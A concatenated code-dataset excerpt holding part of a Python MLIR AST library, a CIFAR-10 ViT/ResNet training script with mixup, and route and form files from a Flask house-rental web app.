return '%s.%s = %s' % (dump_or_value(self.dialect, indent),
dump_or_value(self.name, indent),
dump_or_value(self.value, indent))
return '%s.%s' % (dump_or_value(self.dialect, indent),
dump_or_value(self.name, indent))
class AttributeDict(Node):
_fields_ = ['values']
def __init__(self, node: Token = None, **fields):
self.values = node
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
return '{%s}' % ', '.join(
dump_or_value(v, indent) for v in self.values)
# Default attribute implementation
class Attribute(Node):
_fields_ = ['value']
def dump(self, indent: int = 0) -> str:
return dump_or_value(self.value, indent)
class ArrayAttr(Attribute):
def __init__(self, node: Token = None, **fields):
self.value = node
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
return '[%s]' % dump_or_value(self.value, indent)
class BoolAttr(Attribute):
pass
class DictionaryAttr(Attribute):
def __init__(self, node: Token = None, **fields):
self.value = node
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
return '{%s}' % dump_or_value(self.value, indent)
class ElementsAttr(Attribute):
pass
class DenseElementsAttr(ElementsAttr):
_fields_ = ['attribute', 'type']
def dump(self, indent: int = 0) -> str:
return 'dense<%s> : %s' % (self.attribute.dump(indent),
self.type.dump(indent))
class OpaqueElementsAttr(ElementsAttr):
_fields_ = ['dialect', 'attribute', 'type']
def dump(self, indent: int = 0) -> str:
return 'opaque<%s, %s> : %s' % (self.dialect,
dump_or_value(self.attribute, indent),
self.type.dump(indent))
class SparseElementsAttr(ElementsAttr):
_fields_ = ['indices', 'values', 'type']
def dump(self, indent: int = 0) -> str:
return 'sparse<%s, %s> : %s' % (dump_or_value(self.indices, indent),
dump_or_value(self.values, indent),
self.type.dump(indent))
class PrimitiveAttribute(Attribute):
_fields_ = ['value', 'type']
def __init__(self, node: Token = None, **fields):
self.value = node[0]
if len(node) > 1:
self.type = node[1]
else:
self.type = None
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
return dump_or_value(self.value, indent) + (
': %s' % self.type.dump(indent) if self.type is not None else '')
class FloatAttr(PrimitiveAttribute):
pass
class IntegerAttr(PrimitiveAttribute):
pass
class StringAttr(PrimitiveAttribute):
pass
class IntSetAttr(Attribute):
pass # Use default implementation
class TypeAttr(Attribute):
pass # Use default implementation
class SymbolRefAttr(Attribute):
_fields_ = ['path']
def __init__(self, node: Token = None, **fields):
self.path = node
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
return '::'.join(dump_or_value(p, indent) for p in self.path)
class UnitAttr(Attribute):
_fields_ = []
def dump(self, indent: int = 0) -> str:
return 'unit'
##############################################################################
# Operations
class OpResult(Node):
_fields_ = ['value', 'count']
def __init__(self, node: Token = None, **fields):
self.value = node[0]
if len(node) > 1:
self.count = node[1]
else:
self.count = None
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
return self.value.dump(indent) + (
(':' + dump_or_value(self.count, indent)) if self.count else '')
class Operation(Node):
_fields_ = ['result_list', 'op', 'location']
def __init__(self, node: Token = None, **fields):
index = 0
if isinstance(node[0], list):
self.result_list = node[index]
index += 1
else:
self.result_list = []
self.op = node[index]
index += 1
if len(node) > index:
self.location = node[index]
else:
self.location = None
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
result = ''
if self.result_list:
result += '%s = ' % (', '.join(
dump_or_value(r, indent) for r in self.result_list))
result += dump_or_value(self.op, indent)
if self.location:
result += ' ' + self.location.dump(indent)
return result
class Op(Node):
pass
class GenericOperation(Op):
_fields_ = ['name', 'args', 'attributes', 'type']
def __init__(self, node: Token = None, **fields):
index = 0
self.name = node[index]
index += 1
if len(node) > index and isinstance(node[index], list):
self.args = node[index]
index += 1
else:
self.args = []
if len(node) > index and isinstance(node[index], AttributeDict):
self.attributes = node[index]
index += 1
else:
self.attributes = None
if len(node) > index:
self.type = node[index]
else:
self.type = None
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
result = '%s' % self.name
result += '(%s)' % ', '.join(
dump_or_value(arg, indent) for arg in self.args)
if self.attributes:
result += ' ' + dump_or_value(self.attributes, indent)
if isinstance(self.type, list):
result += ' : ' + ', '.join(
dump_or_value(t, indent) for t in self.type)
else:
result += ' : ' + dump_or_value(self.type, indent)
return result
class CustomOperation(Op):
_fields_ = ['namespace', 'name', 'args', 'type']
def __init__(self, node: Token = None, **fields):
self.namespace = node[0]
self.name = node[1]
if len(node) == 4:
self.args = node[2]
self.type = node[3]
else:
self.args = None
self.type = node[2]
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
result = '%s.%s' % (self.namespace, self.name)
if self.args:
result += ' %s' % ', '.join(
dump_or_value(arg, indent) for arg in self.args)
if isinstance(self.type, list):
result += ' : ' + ', '.join(
dump_or_value(t, indent) for t in self.type)
else:
result += ' : ' + dump_or_value(self.type, indent)
return result
class Location(Node):
_fields_ = ['value']
def dump(self, indent: int = 0) -> str:
return 'loc(%s)' % dump_or_value(self.value, indent)
class FileLineColLoc(Location):
_fields_ = ['file', 'line', 'col']
def dump(self, indent: int = 0) -> str:
return 'loc(%s:%d:%d)' % (self.file, self.line, self.col)
##############################################################################
# Modules, functions, and blocks
class Module(Node):
_fields_ = ['name', 'attributes', 'body', 'location']
def __init__(self, node: Union[Token, Node] = None, **fields):
index = 0
if isinstance(node, Node):
self.name = None
self.attributes = None
self.body = [node]
self.location = None
else:
if len(node) > index and isinstance(node[index], SymbolRefId):
self.name = node[index]
index += 1
else:
self.name = None
if len(node) > index and isinstance(node[index], AttributeDict):
self.attributes = node[index]
index += 1
else:
self.attributes = None
self.body = node[index].children
index += 1
if len(node) > index:
self.location = node[index]
else:
self.location = None
super().__init__(None, **fields)
def dump(self, indent=0) -> str:
result = indent * ' ' + 'module'
if self.name:
result += ' %s' % self.name.dump(indent)
if self.attributes:
result += ' attributes ' + dump_or_value(self.attributes, indent)
result += ' {\n'
result += '\n'.join(block.dump(indent + 1) for block in self.body)
result += '\n' + indent * ' ' + '}'
if self.location:
result += ' ' + self.location.dump(indent)
return result
class Function(Node):
_fields_ = [
'name', 'args', 'result_types', 'attributes', 'body', 'location'
]
def __init__(self, node: Token = None, **fields):
signature = node[0].children
# Parse signature
index = 0
self.name = signature[index]
index += 1
if len(signature) > index and signature[index].data == 'argument_list':
self.args = signature[index].children
index += 1
else:
self.args = []
if (len(signature) > index
and signature[index].data == 'function_result_list'):
self.result_types = signature[index].children
index += 1
else:
self.result_types = []
# Parse rest of function
index = 1
if len(node) > index and isinstance(node[index], AttributeDict):
self.attributes = node[index]
index += 1
else:
self.attributes = None
if len(node) > index and isinstance(node[index], Region):
self.body = node[index]
index += 1
else:
self.body = []
if len(node) > index:
self.location = node[index]
else:
self.location = None
super().__init__(None, **fields)
def dump(self, indent=0) -> str:
result = indent * ' ' + 'func'
result += ' %s' % self.name.dump(indent)
result += '(%s)' % ', '.join(
dump_or_value(arg, indent) for arg in self.args)
if self.result_types:
if len(self.result_types) == 1:
result += ' -> ' + dump_or_value(self.result_types[0], indent)
else:
result += ' -> (%s)' % ', '.join(
dump_or_value(res, indent) for res in self.result_types)
if self.attributes:
result += ' attributes ' + dump_or_value(self.attributes, indent)
result += ' %s' % (self.body.dump(indent) if self.body else '{\n%s}' %
(indent * ' '))
if self.location:
result += ' ' + self.location.dump(indent)
return result
class Region(Node):
_fields_ = ['body']
def __init__(self, node: Token = None, **fields):
self.body = node
super().__init__(None, **fields)
def dump(self, indent=0) -> str:
return ('{\n' + '\n'.join(
block.dump(indent + 1)
for block in self.body) + '\n%s}' % (indent * ' '))
class Block(Node):
_fields_ = ['label', 'body']
def __init__(self, node: Token = None, **fields):
index = 0
if len(node) > index and isinstance(node[index], BlockLabel):
self.label = node[index]
index += 1
else:
self.label = None
if len(node) > index:
self.body = node[index:]
else:
self.body = []
super().__init__(None, **fields)
def dump(self, indent=0) -> str:
result = ''
if self.label:
result += indent * ' ' + self.label.dump(indent)
result += '\n'.join(
indent * ' ' + stmt.dump(indent) for stmt in self.body)
return result
class BlockLabel(Node):
_fields_ = ['name', 'args']
def __init__(self, node: Token = None, **fields):
self.name = node[0]
if len(node) > 1:
self.args = node[1]
else:
self.args = []
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
result = dump_or_value(self.name, indent)
if self.args:
result += ' (%s)' % (', '.join(
dump_or_value(arg, indent) for arg in self.args))
result += ':\n'
return result
class NamedArgument(Node):
_fields_ = ['name', 'type', 'attributes']
def __init__(self, node: Token = None, **fields):
self.name = node[0]
self.type = node[1]
self.attributes = node[2] if len(node) > 2 else None
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
result = '%s: %s' % (dump_or_value(self.name, indent),
dump_or_value(self.type, indent))
if self.attributes:
result += ' %s' % dump_or_value(self.attributes, indent)
return result
##############################################################################
# Affine and semi-affine expressions
# Types of affine expressions
class AffineExpr(Node):
_fields_ = ['value']
def dump(self, indent: int = 0) -> str:
return dump_or_value(self.value, indent)
class SemiAffineExpr(Node):
_fields_ = ['value']
def dump(self, indent: int = 0) -> str:
return dump_or_value(self.value, indent)
class MultiDimAffineExpr(Node):
_fields_ = ['dims']
def __init__(self, node: Token = None, **fields):
if len(node) == 1 and isinstance(node[0], list):
self.dims = node[0]
else:
self.dims = node
super().__init__(None, **fields)
    def dump(self, indent: int = 0) -> str:
        return '(%s)' % dump_or_value(self.dims, indent)
class MultiDimSemiAffineExpr(Node):
_fields_ = ['dims']
def __init__(self, node: Token = None, **fields):
if len(node) == 1 and isinstance(node[0], list):
self.dims = node[0]
else:
self.dims = node
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
return '(%s)' % dump_or_value(self.dims, indent)
# Contents of single/multi-dimensional (semi-)affine expressions
class AffineUnaryOp(Node):
_fields_ = ['operand']
_op_ = '<UNDEF %s>'
def dump(self, indent: int = 0) -> str:
return self._op_ % dump_or_value(self.operand, indent)
class AffineBinaryOp(Node):
_fields_ = ['operand_a', 'operand_b']
_op_ = '<UNDEF>'
def dump(self, indent: int = 0) -> str:
return '%s %s %s' % (dump_or_value(self.operand_a, indent), self._op_,
dump_or_value(self.operand_b, indent))
class AffineNeg(AffineUnaryOp): _op_ = '-%s'
class AffineParens(AffineUnaryOp): _op_ = '(%s)'
class AffineExplicitSymbol(AffineUnaryOp): _op_ = 'symbol(%s)'
class AffineAdd(AffineBinaryOp): _op_ = '+'
class AffineSub(AffineBinaryOp): _op_ = '-'
class AffineMul(AffineBinaryOp): _op_ = '*'
class AffineFloorDiv(AffineBinaryOp): _op_ = 'floordiv'
class AffineCeilDiv(AffineBinaryOp): _op_ = 'ceildiv'
class AffineMod(AffineBinaryOp): _op_ = 'mod'
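# Dump sketch (hedged): an AffineAdd whose operands dump as "d0" and "s0" renders "d0 + s0",
# and an AffineFloorDiv with the same operands renders "d0 floordiv s0", per the _op_
# templates defined above.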
##############################################################################
# (semi-)Affine maps, and integer sets
class DimAndSymbolList(Node):
_fields_ = ['dims', 'symbols']
def __init__(self, node: Token = None, **fields):
index = 0
if len(node) > index:
self.dims = node[index]
index += 1
else:
self.dims = []
if len(node) > index:
self.symbols = node[index]
index += 1
else:
self.symbols = []
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
if len(self.symbols) > 0:
return '(%s)[%s]' % (dump_or_value(self.dims, indent),
dump_or_value(self.symbols, indent))
return '(%s)' % dump_or_value(self.dims, indent)
class AffineConstraint(Node):
_fields_ = ['expr']
class AffineConstraintGreaterEqual(AffineConstraint):
def dump(self, indent: int = 0) -> str:
return '%s >= 0' % dump_or_value(self.expr, indent)
class AffineConstraintEqual(AffineConstraint):
def dump(self, indent: int = 0) -> str:
return '%s == 0' % dump_or_value(self.expr, indent)
class AffineMap(Node):
_fields_ = ['dims_and_symbols', 'map']
def dump(self, indent: int = 0) -> str:
return '%s -> %s' % (dump_or_value(self.dims_and_symbols, indent),
dump_or_value(self.map, indent))
class SemiAffineMap(Node):
_fields_ = ['dims_and_symbols', 'map']
def dump(self, indent: int = 0) -> str:
return '%s -> %s' % (dump_or_value(self.dims_and_symbols, indent),
dump_or_value(self.map, indent))
class IntSet(Node):
_fields_ = ['dims_and_symbols', 'constraints']
def __init__(self, node: Token = None, **fields):
index = 0
if len(node) > index:
self.dims_and_symbols = node[index]
index += 1
else:
self.dims_and_symbols = []
if len(node) > index:
self.constraints = node[index]
index += 1
else:
self.constraints = []
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
return '%s : (%s)' % (dump_or_value(self.dims_and_symbols, indent),
dump_or_value(self.constraints, indent))
##############################################################################
# Top-level definitions
class Definition(Node):
_fields_ = ['name', 'value']
def dump(self, indent: int = 0) -> str:
return (indent * ' ' + dump_or_value(self.name, indent) + ' = ' +
dump_or_value(self.value, indent))
class TypeAliasDef(Definition):
def dump(self, indent: int = 0) -> str:
return (indent * ' ' + dump_or_value(self.name, indent) + ' = type ' +
dump_or_value(self.value, indent))
class AttrAliasDef(Definition):
pass
class AffineMapDef(Definition):
pass
class SemiAffineMapDef(Definition):
pass
class IntSetDef(Definition):
pass
##############################################################################
# Helpers
def _dump_ast_or_value(value: Any, python=True, indent: int = 0) -> str:
""" Helper function to dump the AST node type or a reconstructible
node value.
:param python: Use Python syntax for output.
"""
if python and hasattr(value, 'dump_ast'):
return value.dump_ast()
if not python and hasattr(value, 'dump'):
return value.dump(indent=indent)
# Literals
if not python and isinstance(value, bool):
return 'true' if value else 'false'
if python and isinstance(value, str):
return '"%s"' % value
# Primitive types
if isinstance(value, list):
if not python:
return ', '.join(_dump_ast_or_value(v, python) for v in value)
return '[%s]' % ', '.join(_dump_ast_or_value(v, python) for v in value)
if isinstance(value, tuple):
return '(%s%s)' % (', '.join(
_dump_ast_or_value(v, python)
for v in value), ', ' if python else '')
if isinstance(value, dict):
sep = ': ' if python else ' = '
return '{%s}' % ', '.join(
'%s%s%s' %
(_dump_ast_or_value(k, python), sep, _dump_ast_or_value(v, python))
for k, v in value.items())
return str(value)
def dump_or_value(value: Any, indent: int = 0) -> str:
""" Helper function to dump the MLIR value or a reconstructible
node value. """
return _dump_ast_or_value(value, python=False, indent=indent)
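# Usage sketch for the helpers above: dump_or_value([1, 2, 3]) returns "1, 2, 3" (MLIR style),
# whereas _dump_ast_or_value([1, 2, 3], python=True) returns "[1, 2, 3]"; booleans are printed
# as "true"/"false" only in the non-Python (MLIR) mode.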
``` |
{
"source": "Jokererer/VIT-ResNet-CIFAR10",
"score": 2
} |
#### File: Jokererer/VIT-ResNet-CIFAR10/train_cifar10.py
```python
from __future__ import print_function
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.optim as optim
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
import numpy as np
from da import CutMix, MixUp
import torchvision
import torchvision.transforms as transforms
import os
import argparse
import pandas as pd
import csv
import time
from models import *
from models.vit import ViT
from utils import progress_bar
from models.convmixer import ConvMixer
from randomaug import RandAugment
from torch.optim import lr_scheduler
from cross_entropy import LabelSmoothingCrossEntropy
from schedular import WarmupCosineSchedule
from torch.optim.lr_scheduler import _LRScheduler
torch.cuda.empty_cache()
#learning_rate = 3e-2 # The initial learning rate for SGD
#learning_rate = 1e-4 # The initial learning rate for Adam
# parsers
parser = argparse.ArgumentParser(description='PyTorch CIFAR10 Training')
parser.add_argument('--lr', default=1e-4, type=float, help='learning rate') # resnets.. 1e-3, Vit..1e-4?
parser.add_argument('--opt', default="sgd")
parser.add_argument('--resume', '-r', action='store_true', help='resume from checkpoint')
parser.add_argument('--aug', action='store_true', help='use randomaug')
parser.add_argument('--amp', action='store_true', help='enable AMP training')
#parser.add_argument('--mixup', action='store_true', help='add mixup augmentations')
parser.add_argument('--net', default='vit')
parser.add_argument('--bs', default='64')
parser.add_argument('--n_epochs', type=int, default='200')
parser.add_argument("--img_size", default=224, type=int, help="Resolution size")
parser.add_argument('--patch', default='32', type=int)
parser.add_argument('--alpha', default=1., type=float,
help='mixup interpolation coefficient (default: 1)')
parser.add_argument('--convkernel', default='8', type=int)
# parser.add_argument("--cutmix", action="store_true")
# parser.add_argument("--mixup", action="store_true")
parser.add_argument('--cos', action='store_true', help='Train with cosine annealing scheduling')
args = parser.parse_args()
# take in args
import wandb
watermark = "{}_lr{}".format(args.net, args.lr)
if args.amp:
watermark += "_useamp"
wandb.init(project="Vit-CIFAR10-224-PATCH",
name=watermark)
wandb.config.update(args)
# if args.aug:
# import albumentations
bs = int(args.bs)
use_amp = args.amp
device = 'cuda:0' if torch.cuda.is_available() else 'cpu'
best_acc = 0 # best test accuracy
start_epoch = 0 # start from epoch 0 or last checkpoint epoch
# Data
print('==> Preparing data..')
if args.net == "vit_timm":
size = 384
else:
size = 32
# transform_train = transforms.Compose([
# transforms.RandomCrop(32, padding=4),
# transforms.Resize(size),
# transforms.RandomHorizontalFlip(),
# transforms.ToTensor(),
# transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
# ])
#
# transform_test = transforms.Compose([
# transforms.Resize(size),
# transforms.ToTensor(),
# transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
# ])
#transforms.ToTensor(),
#transforms.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])])
transform_train = transforms.Compose([transforms.RandomResizedCrop(224),
transforms.RandomVerticalFlip(p = 0.5),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
]
)
transform_test = transforms.Compose([ transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
]
)
# transform_train = transforms.Compose([
# transforms.RandomResizedCrop((args.img_size, args.img_size), scale=(0.05, 1.0)),
# transforms.ToTensor(),
# transforms.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5]),
# ])
# transform_test = transforms.Compose([
# transforms.Resize((args.img_size, args.img_size)),
# transforms.ToTensor(),
# transforms.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5]),
# ])
# Add RandAugment with N, M(hyperparameter)
if args.aug:
    N = 2
    M = 14
transform_train.transforms.insert(0, RandAugment(N, M))
trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform_train)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=bs, shuffle=True, num_workers=8)
testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform_test)
testloader = torch.utils.data.DataLoader(testset, batch_size=bs, shuffle=False, num_workers=8)
# trainset = torchvision.datasets.ImageNet('./data/ImageNet/train', transform=transform_train)
# trainloader = torch.utils.data.DataLoader(trainset, batch_size=bs, shuffle=True, num_workers=8)
#
# testset = torchvision.datasets.ImageNet('./data/ImageNet/val',transform=transform_test)
# testloader = torch.utils.data.DataLoader(testset, batch_size=100, shuffle=False, num_workers=8)
classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
# Model
print('==> Building model..')
# net = VGG('VGG19')
if args.net == 'res18':
net = ResNet18()
elif args.net == 'vgg':
net = VGG('VGG19')
elif args.net == 'res34':
net = ResNet34()
elif args.net == 'res50':
net = ResNet50()
elif args.net == 'res101':
net = ResNet101()
elif args.net == "convmixer":
# from paper, accuracy >96%. you can tune the depth and dim to scale accuracy and speed.
net = ConvMixer(256, 16, kernel_size=args.convkernel, patch_size=1, n_classes=10)
elif args.net == "vit":
# ViT for cifar10
net = ViT(
image_size=224,
patch_size=args.patch,
num_classes=10,
dim=768,
depth=12,
heads=12,
mlp_dim=3072,
dropout=0.1,
emb_dropout=0.1
)
elif args.net == "vit_timm":
import timm
net = timm.create_model("vit_large_patch16_384", pretrained=True)
net.head = nn.Linear(net.head.in_features, 10)
net = net.to(device)
if device.startswith('cuda'):
net = torch.nn.DataParallel(net) # make parallel
cudnn.benchmark = True
if args.resume:
# Load checkpoint.
print('==> Resuming from checkpoint..')
assert os.path.isdir('checkpoint'), 'Error: no checkpoint directory found!'
checkpoint = torch.load('./checkpoint/{}-ckpt.t7'.format(args.net))
net.load_state_dict(checkpoint['net'])
best_acc = checkpoint['acc']
start_epoch = checkpoint['epoch']
# Loss is CE
criterion = nn.CrossEntropyLoss()
# criterion = LabelSmoothingCrossEntropy()
if args.opt == "adam":
optimizer = optim.Adam(net.parameters(), lr=args.lr)
elif args.opt == "sgd":
optimizer = torch.optim.SGD(net.parameters(),
lr=args.lr,
momentum=0.9,
weight_decay=1e-4)
# optimizer = optim.SGD(net.parameters(), lr=args.lr)
#optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=5e-4)
# class WarmUpLR(_LRScheduler):
# """warmup_training learning rate scheduler
# Args:
# optimizer: optimzier(e.g. SGD)
# total_iters: totoal_iters of warmup phase
# """
#
# def __init__(self, optimizer, total_iters, last_epoch=-1):
# self.total_iters = total_iters
# super().__init__(optimizer, last_epoch)
#
# def get_lr(self):
# """we will use the first m batches, and set the learning
# rate to base_lr * m / total_iters
# """
# return [base_lr * self.last_epoch / (self.total_iters + 1e-8) for base_lr in self.base_lrs]
# use cosine or reduce LR on Plateau scheduling
if args.cos:
# scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, args.n_epochs)
scheduler = WarmupCosineSchedule(optimizer, warmup_steps=100, t_total=10000)
else:
scheduler = lr_scheduler.ReduceLROnPlateau(optimizer, 'min', patience=3, verbose=True, min_lr=1e-3 * 1e-5,
factor=0.1)
# warmup_epoch = 5
# scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, 100 - warmup_epoch)
#
# iter_per_epoch = len(trainset)
# warmup_scheduler = WarmUpLR(optimizer, iter_per_epoch * warmup_epoch)
if args.cos:
wandb.config.scheduler = "cosine"
else:
wandb.config.scheduler = "ReduceLROnPlateau"
#wandb.config.scheduler = "cosine"
##### Training
# scaler = torch.cuda.amp.GradScaler(enabled=use_amp)
gradient_accumulation_steps = 1
def mixup_data(x, y, alpha=1.0, use_cuda=True):
'''Returns mixed inputs, pairs of targets, and lambda'''
if alpha > 0:
lam = np.random.beta(alpha, alpha)
else:
lam = 1
batch_size = x.size()[0]
if use_cuda:
index = torch.randperm(batch_size).cuda()
else:
index = torch.randperm(batch_size)
mixed_x = lam * x + (1 - lam) * x[index, :]
y_a, y_b = y, y[index]
return mixed_x, y_a, y_b, lam
def mixup_criterion(criterion, pred, y_a, y_b, lam):
return lam * criterion(pred, y_a) + (1 - lam) * criterion(pred, y_b)
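# Worked illustration of the two mixup helpers above: with alpha=1.0 the Beta(1, 1) draw is
# uniform; if lam = 0.7, each mixed input is 0.7 * x_i + 0.3 * x_perm(i), and the loss becomes
# 0.7 * CE(pred, y_i) + 0.3 * CE(pred, y_perm(i)).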
use_cuda = torch.cuda.is_available()
def train(epoch):
print('\nEpoch: %d' % epoch)
net.train()
train_loss = 0
correct = 0
total = 0
train_step = 0
for batch_idx, (inputs, targets) in enumerate(trainloader):
# if epoch < 5:
# warmup_scheduler.step()
# warm_lr = warmup_scheduler.get_lr()
# print("warm_lr:%s" % warm_lr)
inputs, targets = inputs.to(device), targets.to(device)
inputs, targets_a, targets_b, lam = mixup_data(inputs, targets,
args.alpha, use_cuda)
inputs, targets_a, targets_b = map(Variable, (inputs,
targets_a, targets_b))
outputs = net(inputs)
loss = mixup_criterion(criterion, outputs, targets_a, targets_b, lam)
#loss = criterion(outputs, targets)
# if gradient_accumulation_steps > 1:
# loss = loss / gradient_accumulation_steps
# Train with amp
loss.backward()
# with torch.cuda.amp.autocast(enabled=use_amp):
# if (batch_idx + 1) % gradient_accumulation_steps == 0:
        optimizer.step()
        optimizer.zero_grad()
        # Step the LR scheduler after the optimizer step (note: ReduceLROnPlateau would need a
        # metric such as the validation loss and is normally stepped once per epoch instead)
        scheduler.step()
# scaler.scale(loss).backward()
# scaler.step(optimizer)
# scaler.update()
# train_loss += loss.item()
# _, predicted = outputs.max(1)
# total += targets.size(0)
# correct += predicted.eq(targets).sum().item()
# train_step = train_step + 1
train_loss += loss.item()
_, predicted = torch.max(outputs.data, 1)
total += targets.size(0)
correct += (lam * predicted.eq(targets_a.data).sum().item()
+ (1 - lam) * predicted.eq(targets_b.data).sum().item())
train_step = train_step + 1
progress_bar(batch_idx, len(trainloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'
% (train_loss / (batch_idx + 1), 100. * correct / total, correct, total))
return train_loss / (batch_idx + 1), 100. * correct / total, train_step
##### Validation
def test(epoch):
global best_acc
net.eval()
test_loss = 0
correct = 0
total = 0
with torch.no_grad():
for batch_idx, (inputs, targets) in enumerate(testloader):
inputs, targets = inputs.to(device), targets.to(device)
outputs = net(inputs)
loss = criterion(outputs, targets)
test_loss += loss.item()
_, predicted = outputs.max(1)
total += targets.size(0)
correct += predicted.eq(targets).sum().item()
progress_bar(batch_idx, len(testloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'
% (test_loss / (batch_idx + 1), 100. * correct / total, correct, total))
# # # # Update scheduler
# if not args.cos:
# scheduler.step(test_loss)
# Save checkpoint.
acc = 100. * correct / total
if acc > best_acc:
print('Saving..')
state = {"model": net.state_dict(),
"optimizer": optimizer.state_dict(),
"scaler": scheduler.state_dict()}
if not os.path.isdir('checkpoint'):
os.mkdir('checkpoint')
torch.save(state, './checkpoint/' + args.net + '-{}2-ckpt.pth'.format(args.patch))
best_acc = acc
os.makedirs("log", exist_ok=True)
content = time.ctime() + ' ' + f'Epoch {epoch}, lr: {optimizer.param_groups[0]["lr"]:.7f}, val loss: {test_loss:.5f}, acc: {(acc):.5f}'
print(content)
with open(f'log/log_{args.net}_patch{args.patch}.txt', 'a') as appender:
appender.write(content + "\n")
return test_loss / (batch_idx + 1), acc
def main():
train_losses = []
test_losses = []
train_accs = []
test_accs = []
    # Track the total number of training steps
steps = 0
wandb.watch(net)
start_time = time.time()
# learn_rate = 0.
for epoch in range(start_epoch, args.n_epochs):
start = time.time()
# if epoch >= warmup_epoch:
# scheduler.step()
# learn_rate = scheduler.get_lr()[0]
train_loss, train_acc, train_step = train(epoch)
steps = steps + train_step
val_loss, acc = test(epoch)
if args.cos:
scheduler.step(epoch - 1)
train_accs.append(train_acc)
train_losses.append(train_loss)
test_accs.append(acc)
test_losses.append(val_loss)
#optimizer.param_groups[0]["lr"]
# Log training..
        wandb.log({'epoch': epoch, 'train_loss': train_loss, 'train_acc': train_acc, 'val_loss': val_loss, "val_acc": acc,
"lr": optimizer.param_groups[0]["lr"],
"epoch_time": time.time() - start, "steps": steps})
print(
f"Epoch : {epoch} - train_acc: {train_acc:.4f} - train_loss : {train_loss:.4f} -test acc: {acc:.4f} - test loss : {val_loss:.4f} -steps:{steps}\n")
# Write out csv..
with open(f'log/log_{args.net}_patch{args.patch}.csv', 'w') as f:
writer = csv.writer(f, lineterminator='\n')
writer.writerow(train_losses)
writer.writerow(train_accs)
writer.writerow(test_losses)
writer.writerow(test_accs)
print('ALL Time', time.time() - start_time)
print('ALL steps:', steps)
print(train_accs)
print(test_accs)
print(train_losses)
print(test_losses)
# writeout wandb
wandb.save("wandb_{}.h5".format(args.net))
if __name__ == '__main__':
main()
``` |
{
"source": "JokerHai/ihome",
"score": 2
} |
#### File: api/v1/search.py
```python
from flask import render_template, jsonify, request, current_app
from flask_login import current_user
from app.common.response_code import RET
from ...common import constants
from app.models import House
from ..v1 import api
@api.route('/search_view',methods = ['GET'])
def search_view():
return render_template('search/search.html')
@api.route('/houses_list',methods = ['GET'])
def houses_list():
try:
        # Pagination
        page = request.args.get('page', 1, type=int)
        # Area ID
        aid = request.args.get('aid')
        # Start date
        sd = request.args.get('sd')
        # End date
        ed = request.args.get('ed')
        # Sort key
        sk = request.args.get('sk')
filters = []
if aid :
filters.append(House.area_id == aid)
if sd :
filters.append(House.create_time >= sd)
if ed :
filters.append(House.create_time <= ed)
if sk == "booking":
order = House.order_count.desc()
elif sk == "price-inc":
order = House.price.asc()
elif sk == "price des":
order = House.price.desc()
else:
order = House.create_time.desc()
pagination = House.query.filter(*filters).order_by(order).paginate(
page,per_page = constants.HOME_POSTS_PER_PAGE,
error_out= False
)
houses = pagination.items
return jsonify(
status = RET.OK,
errmsg = "请求成功",
data = {
'houses':[house.to_basic_dict() for house in houses]
},
total_page = pagination.total
)
except Exception as e:
current_app.logger.error(e)
return jsonify(status=RET.DBERR, errmsg="程序异常,请联系管理员")
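# A hypothetical request against the endpoint above (query parameter names as parsed there):
# GET /houses_list?aid=1&sd=2021-01-01&ed=2021-02-28&sk=price-inc&page=2
# returns the second page of houses in area 1 created within that date range, cheapest first.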
@api.route('/show_detail/<int:ids>',methods = ['GET'])
def show_detail(ids):
houses = House.query.get_or_404(ids)
data = {'house':houses.to_full_dict()}
return render_template('search/detail.html',data = data)
```
#### File: api/v1/users.py
```python
from flask_login import login_required, current_user
from ..v1 import api
from flask import render_template
@api.route('/user_index',methods = ['GET','POST'])
@login_required
def user_index():
data = current_user.to_dict()
return render_template('users/user_index.html',info = data)
```
#### File: app/auth/forms.py
```python
from flask_wtf import FlaskForm
from wtforms.validators import ValidationError
from ..models import User
class RegistrationForm(FlaskForm):
# register_mobile = StringField(_name = 'abc',validators=[
# DataRequired(),length(1,11),
# Regexp('1[3-9]\d{9}',0,
# 'mobile must have number underscores'
# )])
# password = PasswordField('password',validators=[
# DataRequired(),length(6,12)
# ])
# submit = SubmitField('register')
    def validate_mobile(self, field):
        # WTForms inline validators are called as instance methods with (form, field)
        if User.query.filter_by(username=field.data).first():
            raise ValidationError('mobile already in use.')
```
#### File: app/common/common.py
```python
from functools import wraps
from flask import session, current_app, g
import re
# Validate a mobile phone number
def check_mobile(mobile):
if mobile is not None:
if re.match("1[3-9]\d{9}", mobile) is not None:
return True
else:
return False
else:
return False
